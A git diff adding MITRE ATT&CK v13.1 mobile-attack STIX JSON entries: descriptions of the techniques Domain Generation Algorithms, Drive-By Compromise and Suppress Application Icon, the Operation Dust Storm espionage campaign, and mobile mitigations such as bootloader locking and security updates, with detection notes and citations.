@@ -0,0 +1,59 @@ +{ + "type": "bundle", + "id": "bundle--b012da54-ad4e-4585-83df-de13a6c0e0ed", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--fd211238-f767-4599-8c0d-9dca36624626", + "created": "2022-04-05T19:59:03.161Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1637.001", + "url": "https://attack.mitre.org/techniques/T1637/001" + }, + { + "source_name": "Data Driven Security DGA", + "url": "https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/", + "description": "Jacobs, J. (2014, October 2). Building a DGA Classifier: Part 2, Feature Engineering. Retrieved February 18, 2019." + }, + { + "source_name": "securelist rotexy 2018", + "url": "https://securelist.com/the-rotexy-mobile-trojan-banker-and-ransomware/88893/", + "description": "T. Shishkova, L. Pikman. (2018, November 22). The Rotexy mobile Trojan \u2013 banker and ransomware. Retrieved September 23, 2019." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may use [Domain Generation Algorithms](https://attack.mitre.org/techniques/T1637/001) (DGAs) to procedurally generate domain names for uses such as command and control communication or malicious application distribution.(Citation: securelist rotexy 2018)\n\nDGAs increase the difficulty for defenders to block, track, or take over the command and control channel, as there could potentially be thousands of domains that malware can check for instructions.", + "modified": "2022-04-05T19:59:22.888Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Domain Generation Algorithms", + "x_mitre_detection": "Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There are a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, a more general approach for detecting a suspicious domain is to check for recently registered names ", + "kill_chain_phases": [ + { + "phase_name": "command-and-control", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": true, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--fd339382-bfec-4bf0-8d47-1caedc9e7e57.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--fd339382-bfec-4bf0-8d47-1caedc9e7e57.json new file mode 100644 index 0000000000000000000000000000000000000000..a4b00673c79ce7d7426da31fe5f74147527db19d --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--fd339382-bfec-4bf0-8d47-1caedc9e7e57.json 
@@ -0,0 +1,59 @@ +{ + "type": "bundle", + "id": "bundle--c194d6e6-111e-4c69-9a9f-be1b5f92a224", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T18:24:56.530Z", + "name": "Drive-By Compromise", + "description": "Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring an [Application Access Token](https://attack.mitre.org/techniques/T1550/001).\n\nMultiple ways of delivering exploit code to a browser exist, including:\n\n* A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting.\n* Malicious ads are paid for and served through legitimate ad providers.\n* Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content).\n\nOften the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted attack is referred to a strategic web compromise or watering hole attack. There are several known examples of this occurring.(Citation: Lookout-StealthMango)\n\nTypical drive-by compromise process:\n\n1. A user visits a website that is used to host the adversary controlled content.\n2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version. \n * The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes.\n3. 
Upon finding a vulnerable version, exploit code is delivered to the browser.\n4. If exploitation is successful, then it will give the adversary code execution on the user's system unless other protections are in place.\n * In some cases a second visit to the website after the initial scan is required before exploit code is delivered.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Mobile security products can often alert the user if their device is vulnerable to known exploits.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "2.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--fd339382-bfec-4bf0-8d47-1caedc9e7e57", + "created": "2017-10-25T14:48:06.822Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1456", + "external_id": "T1456" + }, + { + "source_name": "Lookout-StealthMango", + "description": "Lookout. (n.d.). Stealth Mango & Tangelo. Retrieved September 27, 2018.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-22.html", + "external_id": "CEL-22" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--fd658820-cbba-4c95-8ac9-0fac6b1099e2.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--fd658820-cbba-4c95-8ac9-0fac6b1099e2.json new file mode 100644 index 0000000000000000000000000000000000000000..df1e1a4878d2aca0986064ece569a47d56ecf8e0 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--fd658820-cbba-4c95-8ac9-0fac6b1099e2.json 
@@ -0,0 +1,63 @@ +{ + "type": "bundle", + "id": "bundle--5a32fc9f-9879-4112-8eeb-3c2efd8efdd9", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--fd658820-cbba-4c95-8ac9-0fac6b1099e2", + "created": "2019-07-11T18:09:42.039Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1508", + "url": "https://attack.mitre.org/techniques/T1508" + }, + { + "source_name": "sunny-stolen-credentials", + "url": "https://www.welivesecurity.com/2017/02/22/sunny-chance-stolen-credentials-malicious-weather-app-found-google-play/", + "description": "Luk\u00e1\u0161 \u0160tefanko. (2017, February 22). Sunny with a chance of stolen credentials: Malicious weather app found on Google Play. Retrieved July 11, 2019." + }, + { + "source_name": "android-trojan-steals-paypal-2fa", + "url": "https://www.welivesecurity.com/2018/12/11/android-trojan-steals-money-paypal-accounts-2fa/", + "description": "Luk\u00e1\u0161 \u0160tefanko. (2018, December 11). Android Trojan steals money from PayPal accounts even with 2FA on. Retrieved July 11, 2019." + }, + { + "source_name": "bankbot-spybanker", + "url": "https://www.cyber.nj.gov/threat-profiles/android-malware-variants/bankbot-spybanker", + "description": "NJCCIC. (2017, March 2). BankBot/Spy Banker. Retrieved July 11, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "A malicious application could suppress its icon from being displayed to the user in the application launcher to hide the fact that it is installed, and to make it more difficult for the user to uninstall the application. 
Hiding the application's icon programmatically does not require any special permissions.\n\nThis behavior has been seen in the BankBot/Spy Banker family of malware.(Citation: android-trojan-steals-paypal-2fa)(Citation: sunny-stolen-credentials)(Citation: bankbot-spybanker)", + "modified": "2022-03-30T20:07:33.279Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Suppress Application Icon", + "x_mitre_detection": "The user can examine the list of all installed applications, including those with a suppressed icon, in the device settings.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/campaign/campaign--4603cf2f-06d0-4970-9c5d-5071b08c817f.json b/cti-ATT-CK-v13.1/mobile-attack/campaign/campaign--4603cf2f-06d0-4970-9c5d-5071b08c817f.json new file mode 100644 index 0000000000000000000000000000000000000000..7c3a28507d799db6f8df61cd92973232624c6c83 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/campaign/campaign--4603cf2f-06d0-4970-9c5d-5071b08c817f.json 
@@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--637b46b8-8146-4635-878e-0f17f646cb91", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-09-30T21:05:22.490Z", + "name": "Operation Dust Storm", + "description": "[Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) was a long-standing persistent cyber espionage campaign that targeted multiple industries in Japan, South Korea, the United States, Europe, and several Southeast Asian countries. By 2015, the [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) threat actors shifted from government and defense-related intelligence targets to Japanese companies or Japanese subdivisions of larger foreign organizations supporting Japan's critical infrastructure, including electricity generation, oil and natural gas, finance, transportation, and construction.(Citation: Cylance Dust Storm)\n\n[Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) threat actors also began to use Android backdoors in their operations by 2015, with all identified victims at the time residing in Japan or South Korea.(Citation: Cylance Dust Storm)", + "aliases": [ + "Operation Dust Storm" + ], + "first_seen": "2010-01-01T07:00:00.000Z", + "last_seen": "2016-02-01T06:00:00.000Z", + "x_mitre_first_seen_citation": "(Citation: Cylance Dust Storm)", + "x_mitre_last_seen_citation": "(Citation: Cylance Dust Storm)", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "type": "campaign", + "id": "campaign--4603cf2f-06d0-4970-9c5d-5071b08c817f", + "created": "2022-09-29T20:00:38.136Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/campaigns/C0016", + "external_id": "C0016" + }, + { + "source_name": "Cylance Dust Storm", + "description": "Gross, J. (2016, February 23). Operation Dust Storm. 
Retrieved December 22, 2021.", + "url": "https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.0.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564.json b/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564.json new file mode 100644 index 0000000000000000000000000000000000000000..8be427100df7dee9693074b66550a22e9d595bcc --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564.json 
@@ -0,0 +1,31 @@ +{ + "type": "bundle", + "id": "bundle--c573ead3-04f5-4c38-9379-a9299fc069dd", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "type": "course-of-action", + "created": "2017-10-25T14:48:51.657Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M1006", + "external_id": "M1006" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "name": "Use Recent OS Version", + "description": "New mobile operating system versions bring not only patches against discovered vulnerabilities but also often bring security architecture improvements that provide resilience against potential vulnerabilities or weaknesses that have not yet been discovered. They may also bring improvements that block use of observed adversary techniques.", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--1553b156-6767-47f7-9eb4-2a692505666d.json b/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--1553b156-6767-47f7-9eb4-2a692505666d.json new file mode 100644 index 0000000000000000000000000000000000000000..2f19c8aeed726ff6be743b0dfcf03a7395c848b5 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--1553b156-6767-47f7-9eb4-2a692505666d.json 
@@ -0,0 +1,34 @@ +{ + "type": "bundle", + "id": "bundle--15fea9dd-e9f1-4463-84ac-0e57dda42e51", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "course-of-action", + "id": "course-of-action--1553b156-6767-47f7-9eb4-2a692505666d", + "created": "2019-10-18T12:49:58.924Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "M1005", + "url": "https://attack.mitre.org/mitigations/M1005" + } + ], + "x_mitre_deprecated": true, + "revoked": false, + "description": "Enterprises can vet applications for exploitable vulnerabilities or unwanted (privacy-invasive or malicious) behaviors. Enterprises can inspect applications themselves or use a third-party service.\n\nEnterprises may impose policies to only allow pre-approved applications to be installed on their devices or may impose policies to block use of specific applications known to have issues. In Bring Your Own Device (BYOD) environments, enterprises may only be able to impose these policies over an enterprise-managed portion of the device.\n\nApplication Vetting is not a complete mitigation. Techniques such as [Evade Analysis Environment](https://attack.mitre.org/techniques/T1523) exist that can enable adversaries to bypass vetting.", + "modified": "2022-04-06T14:47:46.019Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Application Vetting", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--25dc1ce8-eb55-4333-ae30-a7cb4f5894a1.json b/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--25dc1ce8-eb55-4333-ae30-a7cb4f5894a1.json new file mode 100644 index 0000000000000000000000000000000000000000..80f3a3ee0cb237f6e538d24175cdb6cd79d5f482 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--25dc1ce8-eb55-4333-ae30-a7cb4f5894a1.json @@ -0,0 +1,32 @@ +{ + "type": "bundle", + "id": "bundle--9df178e1-7e46-4aac-8d02-06d1dcbb0a7f", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--25dc1ce8-eb55-4333-ae30-a7cb4f5894a1", + "type": "course-of-action", + "created": "2017-10-25T14:48:53.732Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M1013", + "external_id": "M1013" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "name": "Application Developer Guidance", + "description": "This mitigation describes any guidance or training given to developers of applications to avoid introducing security weaknesses that an adversary may be able to take advantage of.", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--649f7268-4c12-483b-ac84-4b7bca9fe2ee.json b/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--649f7268-4c12-483b-ac84-4b7bca9fe2ee.json new file mode 100644 index 0000000000000000000000000000000000000000..7c89f505b0cb1d195fd3589884419eebb4cf347b --- /dev/null 
+++ b/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--649f7268-4c12-483b-ac84-4b7bca9fe2ee.json @@ -0,0 +1,31 @@ +{ + "type": "bundle", + "id": "bundle--b72a9ad0-cfc6-4fff-8be5-1ec72e2efc46", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--649f7268-4c12-483b-ac84-4b7bca9fe2ee", + "type": "course-of-action", + "created": "2017-10-25T14:48:53.318Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M1012", + "external_id": "M1012" + } + ], + "modified": "2020-06-24T15:08:18.395Z", + "name": "Enterprise Policy", + "description": "An enterprise mobility management (EMM), also known as mobile device management (MDM), system can be used to provision policies to mobile devices to control aspects of their allowed behavior.", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1.json b/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1.json new file mode 100644 index 0000000000000000000000000000000000000000..7e6a728a49acd46ed1df3ff9e95ac82e7d140ffa --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1.json 
@@ -0,0 +1,31 @@ +{ + "type": "bundle", + "id": "bundle--3c40b91e-d0c1-4bde-bb2f-f1ee090eb9a6", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "type": "course-of-action", + "created": "2019-10-18T12:53:03.508Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "M1011", + "url": "https://attack.mitre.org/mitigations/M1011" + } + ], + "modified": "2019-10-18T15:51:48.318Z", + "name": "User Guidance", + "description": "Describes any guidance or training given to users to set particular configuration settings or avoid specific potentially risky behaviors.", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--7b1cf46f-784b-405a-a8dd-4624c19d8321.json b/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--7b1cf46f-784b-405a-a8dd-4624c19d8321.json new file mode 100644 index 0000000000000000000000000000000000000000..654ae479b41cd20958e8e62d40ec26291dbfbcc9 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--7b1cf46f-784b-405a-a8dd-4624c19d8321.json 
@@ -0,0 +1,31 @@ +{ + "type": "bundle", + "id": "bundle--381c39ab-a5d4-4a89-8630-9382dd4d218d", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--7b1cf46f-784b-405a-a8dd-4624c19d8321", + "type": "course-of-action", + "created": "2017-10-25T14:48:52.270Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M1004", + "external_id": "M1004" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "name": "System Partition Integrity", + "description": "Ensure that Android devices being used include and enable the Verified Boot capability, which cryptographically ensures the integrity of the system partition.", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--8220b57e-c400-4525-bf69-f8edc6b389a8.json b/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--8220b57e-c400-4525-bf69-f8edc6b389a8.json new file mode 100644 index 0000000000000000000000000000000000000000..ffe8c2f01bd2ead53fcbee767c24238bc5bc7081 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--8220b57e-c400-4525-bf69-f8edc6b389a8.json 
@@ -0,0 +1,41 @@ +{ + "type": "bundle", + "id": "bundle--2bbfd31b-d774-4eff-9888-1db0bdc297db", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--8220b57e-c400-4525-bf69-f8edc6b389a8", + "type": "course-of-action", + "created": "2017-10-25T14:48:50.769Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M1009", + "external_id": "M1009" + }, + { + "source_name": "TechCrunch-ATS", + "description": "Kate Conger. (2016, June 14). Apple will require HTTPS connections for iOS apps by the end of 2016. Retrieved December 19, 2016.", + "url": "https://techcrunch.com/2016/06/14/apple-will-require-https-connections-for-ios-apps-by-the-end-of-2016/" + }, + { + "source_name": "Android-NetworkSecurityConfig", + "description": "Google. (n.d.). Network Security Configuration. Retrieved December 19, 2016.", + "url": "https://developer.android.com/training/articles/security-config.html" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "name": "Encrypt Network Traffic", + "description": "Application developers should encrypt all of their application network traffic using the Transport Layer Security (TLS) protocol to ensure protection of sensitive data and deter network-based attacks. If desired, application developers could perform message-based encryption of data before passing it for TLS encryption.\n\niOS's App Transport Security feature can be used to help ensure that all application network traffic is appropriately protected. 
Apple intends to mandate use of App Transport Security (Citation: TechCrunch-ATS) for all apps in the Apple App Store unless appropriate justification is given.\n\nAndroid's Network Security Configuration feature similarly can be used by app developers to help ensure that all of their application network traffic is appropriately protected (Citation: Android-NetworkSecurityConfig).\n\nUse of Virtual Private Network (VPN) tunnels, e.g. using the IPsec protocol, can help mitigate some types of network attacks as well.", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--8ccd428d-39da-4e8f-a55b-d48ea1d56e58.json b/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--8ccd428d-39da-4e8f-a55b-d48ea1d56e58.json new file mode 100644 index 0000000000000000000000000000000000000000..8b5c9cf53c60a6a981cf67d19120f6a21ead0626 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--8ccd428d-39da-4e8f-a55b-d48ea1d56e58.json 
@@ -0,0 +1,31 @@ +{ + "type": "bundle", + "id": "bundle--176bd630-6879-437d-9700-820ec6aa9711", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--8ccd428d-39da-4e8f-a55b-d48ea1d56e58", + "type": "course-of-action", + "created": "2017-10-25T14:48:49.554Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M1003", + "external_id": "M1003" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "name": "Lock Bootloader", + "description": "On devices that provide the capability to unlock the bootloader (hence allowing any operating system code to be flashed onto the device), perform periodic checks to ensure that the bootloader is locked.", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--bcecd036-f40e-4916-9f8e-fd0ccf0ece8d.json b/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--bcecd036-f40e-4916-9f8e-fd0ccf0ece8d.json new file mode 100644 index 0000000000000000000000000000000000000000..0aac6fd839d618f4ae81807a6ffdc8677a6e058c --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--bcecd036-f40e-4916-9f8e-fd0ccf0ece8d.json 
@@ -0,0 +1,31 @@ +{ + "type": "bundle", + "id": "bundle--b3833279-11c1-4eb7-96ef-bb7ece2cd419", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--bcecd036-f40e-4916-9f8e-fd0ccf0ece8d", + "type": "course-of-action", + "created": "2019-10-18T12:51:36.488Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "M1001", + "url": "https://attack.mitre.org/mitigations/M1001" + } + ], + "modified": "2019-10-18T14:56:15.631Z", + "name": "Security Updates", + "description": "Install security updates in response to discovered vulnerabilities.\n\nPurchase devices with a vendor and/or mobile carrier commitment to provide security updates in a prompt manner for a set period of time.\n\nDecommission devices that will no longer receive security updates.\n\nLimit or block access to enterprise resources from devices that have not installed recent security updates.\n\nOn Android devices, access can be controlled based on each device's security patch level. On iOS devices, access can be controlled based on the iOS version.", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--cf2cccb1-cab8-431a-8ecf-f7874d05f433.json b/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--cf2cccb1-cab8-431a-8ecf-f7874d05f433.json new file mode 100644 index 0000000000000000000000000000000000000000..fe1347be86942e367165f7b924432241ce677093 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--cf2cccb1-cab8-431a-8ecf-f7874d05f433.json 
@@ -0,0 +1,31 @@ +{ + "type": "bundle", + "id": "bundle--830d2874-a1cf-491c-b836-d17ee88f466f", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--cf2cccb1-cab8-431a-8ecf-f7874d05f433", + "type": "course-of-action", + "created": "2017-10-25T14:48:52.601Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M1010", + "external_id": "M1010" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "name": "Deploy Compromised Device Detection Method", + "description": "A variety of methods exist that can be used to enable enterprises to identify compromised (e.g. rooted/jailbroken) devices, whether using security mechanisms built directly into the device, third-party mobile security applications, enterprise mobility management (EMM)/mobile device management (MDM) capabilities, or other methods. Some methods may be trivial to evade while others may be more sophisticated.", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--e829ee51-1caf-4665-ba15-7f8979634124.json b/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--e829ee51-1caf-4665-ba15-7f8979634124.json new file mode 100644 index 0000000000000000000000000000000000000000..92ce5ff3afb0ac59d21e31098ed20d6cb49fbf0d --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/course-of-action/course-of-action--e829ee51-1caf-4665-ba15-7f8979634124.json 
